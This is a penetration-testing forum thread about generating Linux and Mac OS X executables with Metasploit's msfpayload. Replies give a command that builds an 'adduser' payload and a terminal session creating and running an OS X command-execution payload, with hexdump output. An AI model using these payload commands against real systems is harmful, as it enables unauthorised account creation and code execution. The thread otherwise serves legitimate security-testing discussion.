Results 1 to 6 of 6

Thread: MSFPAYLOAD - Creating Executable Files For MAC OS X & Linux Targets?

  1. #1
    mcurran
    Guest

    Default MSFPAYLOAD - Creating Executable Files For MAC OS X & Linux Targets?

    Hello:

    I was just wondering if anyone knows how to create a linux executable or mac os x executable with ./msfpayload? Are these formats supported, or would you need to build the packages after using ./msfpayload? I have searched online and wasn't able to find much information on this, but I'm guessing you would need to convert the exe's to a suitable format for each target OS (Mac's being harder, because you would probably need to build it on a Mac system or Mac VM). Please let me know if you have any info that may help or can point me in the right direction.

    Sorry for posting so many questions about ettercap in the HowTo's - If any forum admins. see them, feel free to remove/clean them up.

    Thank you,

    mcurran

  2. #2
    Junior Member Valifake's Avatar
    Join Date
    Jan 2010
    Location
    Don't worry Sir, I'm from the Internets
    Posts
    38

    Default

    You have to select the correct exploit for the target system:

    Usage: ./msfpayload <payload> [var=val] <S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA>
    View the whole list with:

    Code:
    ./msfpayload | less
    example:
    Code:
    ./msfpayload linux/x86/adduser X > adduser && chmod +x adduser
    Syn: Metasploit Payloads - msfpayload

    The link just deals with .exe's but i guess it works with all OS's. If you find some good sites please post the links back here.
    Mathematical reasoning may be regarded rather schematically as the exercise of a combination of two facilities, which we may call intuition and ingenuity.

  3. #3
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default


    Love the signature.....

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Quote Originally Posted by Barry View Post
    Love the signature.....
    Yes.

    I would say though that while most people know Googles URL, they don't always spend enough time there before posting here.

    If I can perform one or two Google searches and immediately find information that answers a poster's question (and almost every time I decide to try this that is exactly what happens), you better believe I am going to tell the poster about it.

    "Search first" is one of the forum rules for a reason, and as with every other forum rule, when people don't follow it they get reminded about it. The goal is to help people help themselves, and how else do you expect people to learn if you don't tell them?
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5
    mcurran
    Guest

    Default

    Quote Originally Posted by Valifake View Post
    You have to select the correct exploit for the target system:


    View the whole list with:

    Code:
    ./msfpayload | less
    example:
    Code:
    ./msfpayload linux/x86/adduser X > adduser && chmod +x adduser
    Syn: Metasploit Payloads - msfpayload

    The link just deals with .exe's but i guess it works with all OS's. If you find some good sites please post the links back here.
    This tells me nothing. I already know how to select the correct payload, or exploit. You guessed wrong by assuming they work with all OS's; hence my question... The generated executables do not work on either system as is. One thing I have not tried is creating the files with RAW data and then figuring out how to package them for each OS... I'll update this post if I eventually find a solution for one or both systems.

    lupin: You are essentially doing exactly what his signature is asking us not to do!

  6. #6
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by mcurran View Post
    This tells me nothing. I already know how to select the correct payload, or exploit. You guessed wrong by assuming they work with all OS's; hence my question... The generated executables do not work on either system as is. One thing I have not tried is creating the files with RAW data and then figuring out how to package them for each OS... I'll update this post if I eventually find a solution for one or both systems.
    Code:
    [laptop:~/pentest/msf3] admin% ./msfpayload osx/x86/exec O
    
           Name: OSX Execute Command
        Version: 6479
       Platform: OSX
           Arch: x86
    Needs Admin: No
     Total size: 30
           Rank: Normal
    
    Provided by:
      snagg <snagg@openssl.it>
    
    Basic options:
    Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
    CMD                    yes       The command string to execute
    
    Description:
      Execute an arbitrary command
    
    
    [laptop:~/pentest/msf3] admin% ./msfpayload osx/x86/exec CMD=whoami X > random_test
    
    Created by msfpayload (http://www.metasploit.com).
    Payload: osx/x86/exec
     Length: 36
    Options: CMD=whoami
    [laptop:~/pentest/msf3] admin% file random_test
    random_test: Mach-O executable i386
    [laptop:~/pentest/msf3] admin% ./random_test
    ./random_test: Permission denied.
    [laptop:~/pentest/msf3] admin% chmod +x ./random_test 
    [laptop:~/pentest/msf3] admin% ./random_test 
    Bus error
    [laptop:~/pentest/msf3] admin% hexdump -C random_test | head
    00000000  ce fa ed fe 07 00 00 00  03 00 00 00 02 00 00 00  |????............|
    00000010  0b 00 00 00 64 03 00 00  85 00 00 00 01 00 00 00  |....d...........|
    00000020  38 00 00 00 5f 5f 50 41  47 45 5a 45 52 4f 00 00  |8...__PAGEZERO..|
    00000030  00 00 00 00 00 00 00 00  00 10 00 00 00 00 00 00  |................|
    00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    00000050  00 00 00 00 01 00 00 00  7c 00 00 00 5f 5f 54 45  |........|...__TE|
    00000060  58 54 00 00 00 00 00 00  00 00 00 00 00 10 00 00  |XT..............|
    00000070  00 10 00 00 00 00 00 00  00 10 00 00 07 00 00 00  |................|
    00000080  05 00 00 00 01 00 00 00  00 00 00 00 5f 5f 74 65  |............__te|
    00000090  78 74 00 00 00 00 00 00  00 00 00 00 5f 5f 54 45  |xt..........__TE|
    [laptop:~/pentest/msf3] admin% hexdump -C /usr/bin/nc | head
    00000000  ca fe ba be 00 00 00 02  00 00 00 07 00 00 00 03  |????............|
    00000010  00 00 10 00 00 00 6a 40  00 00 00 0c 00 00 00 12  |......j@........|
    00000020  00 00 00 0a 00 00 80 00  00 00 5b 70 00 00 00 0c  |..........[p....|
    00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    *
    00001000  ce fa ed fe 07 00 00 00  03 00 00 00 02 00 00 00  |????............|
    00001010  0d 00 00 00 9c 04 00 00  85 00 00 00 01 00 00 00  |................|
    00001020  38 00 00 00 5f 5f 50 41  47 45 5a 45 52 4f 00 00  |8...__PAGEZERO..|
    00001030  00 00 00 00 00 00 00 00  00 10 00 00 00 00 00 00  |................|
    00001040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    [laptop:~/pentest/msf3] admin%
    Seems like the file operates quite well but doesn't have quite the right header for an OS X system.

    Furthering that, and actually doing some research on the entire thing, reveals no official release notes for the OS X payloads.

    Which, if one applies a layer of logic, says that they have not been officially released yet. If you like you can start to contribute to them by providing an OS X i386 executable structure that is generic across all the platforms. I did the above tests on a 10.5 system, which looks like it's almost but not quite going to work (hint: Google what a bus error is). The same applies to the linux system as well, the elf header is almost but not quite there.

    It wasn't hard to figure this out by the way, and posting any information is better than complaining that it doesn't work.

    lupin: You are essentially doing exactly what his signature is asking us not to do!
    Such a pity the man is a moderator and can do whatever the hell he wants to. Besides which he is smart-than-thou (STT) and probably more awesome.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •